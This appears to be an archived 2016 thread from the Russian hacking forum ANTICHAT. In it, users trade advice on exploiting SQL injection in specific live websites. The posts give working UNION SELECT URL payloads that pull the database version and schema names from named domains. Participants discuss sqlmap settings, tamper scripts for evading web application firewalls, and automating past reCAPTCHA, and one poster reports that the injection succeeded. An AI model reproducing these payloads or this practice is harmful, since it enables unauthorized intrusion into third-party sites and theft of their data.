ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
02.09.2016, 15:22
|
|
Guest
Сообщений: n/a
Провел на форуме:
104689
Репутация:
1
|
|
Сообщение от pw0ned
pw0ned said:
↑
WAF блочит если я не ошибаюсь. Крути руками Ошибаешься waf не причём
+ логично если хав обошёл мамп тем более сможет обойти
|
|
|
|
02.09.2016, 15:24
|
|
Guest
Сообщений: n/a
Провел на форуме:
6685
Репутация:
0
|
|
Сообщение от r1l
r1l said:
↑
Ребят помогите раскрутить
Код:
Code:
http://trafficswirl.com/teamsplash.php?tid=1%27
Ни как мне эта скуля не дается((
с --technique=EU не крутит, --level=5 --risk=3 тоже не крутит, ХАВИДЖИ раскручивает эту уязвимость, sqlmap не может(
либо я дурак либо лыжи правда не едут....
уязвимость раскручивается точно знаю, только как?(
Код:
Code:
http://trafficswirl.com/teamsplash.php?tid=1'+union+select+version(),2+--+
|
|
|
|
02.09.2016, 15:31
|
|
Guest
Сообщений: n/a
Провел на форуме:
33728
Репутация:
14
|
|
Сообщение от Sensoft
Sensoft said:
↑
Ошибаешься waf не причём
+ логично если хав обошёл мамп тем более сможет обойти Ты сам в мап уязвимость пихал ? Говорю ваф блочит, ты не слушаешь
|
|
|
|
02.09.2016, 15:37
|
|
Guest
Сообщений: n/a
Провел на форуме:
6685
Репутация:
0
|
|
Код:
Code:
http://trafficswirl.com/teamsplash.php?tid=-1'+union+select+schema_name,2+/*!From*/+information_schema.schemata+--+sp
В ссылках вывод |
|
|
|
02.09.2016, 15:54
|
|
Guest
Сообщений: n/a
Провел на форуме:
104689
Репутация:
1
|
|
Сообщение от pw0ned
pw0ned said:
↑
Ты сам в мап уязвимость пихал ? Говорю ваф блочит, ты не слушаешь Сувал но по логам нет не чего на счёт ваф у меня норм проходит
ваф меня пропускает
|
|
|
|
02.09.2016, 15:57
|
|
Guest
Сообщений: n/a
Провел на форуме:
33728
Репутация:
14
|
|
Сообщение от Sensoft
Sensoft said:
↑
Сувал но по логам нет не чего на счёт ваф у меня норм проходит
ваф меня пропускает ну-ка заскринь
|
|
|
|
02.09.2016, 15:58
|
|
Guest
Сообщений: n/a
Провел на форуме:
4609
Репутация:
0
|
|
все ребят, отбой раскрутил, ахаха, но всеравно спасибо)
|
|
|
|
02.09.2016, 16:02
|
|
Guest
Сообщений: n/a
Провел на форуме:
33728
Репутация:
14
|
|
Сообщение от r1l
r1l said:
↑
Ребят помогите раскрутить
Код:
Code:
http://trafficswirl.com/teamsplash.php?tid=1%27
Ни как мне эта скуля не дается((
с --technique=EU не крутит, --level=5 --risk=3 тоже не крутит, ХАВИДЖИ раскручивает эту уязвимость, sqlmap не может(
либо я дурак либо лыжи правда не едут....
уязвимость раскручивается точно знаю, только как?( Можно попробовать обойти ваф набором тамперов.
https://github.com/sqlmapproject/sqlmap/tree/master/waf
|
|
|
|
02.09.2016, 20:52
|
|
Новичок
Регистрация: 26.05.2007
Сообщений: 8
Провел на форуме:
23906
Репутация:
-5
|
|
Часто стал натыкаться на сайтах на "Защиту от роботов" в основном рекапча
её как то можно обойти?
Даже если через сторонний сервис чекать, то как автоматизировать с тем же к примеру sqlmap
|
|
|
02.09.2016, 22:40
|
|
Guest
Сообщений: n/a
Провел на форуме:
4609
Репутация:
0
|
|
Кручу уязвимость:
Код:
Code:
http://asia-fashion-wholesale.com/welcome/index.php?asday=2016-5-5&catId=1%27%22&_a=viewCat_new
раскручиваю через --dbms=MySQL --risk=3
но чет какая то лажа выходит(
реально ли такое раскрутить? |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
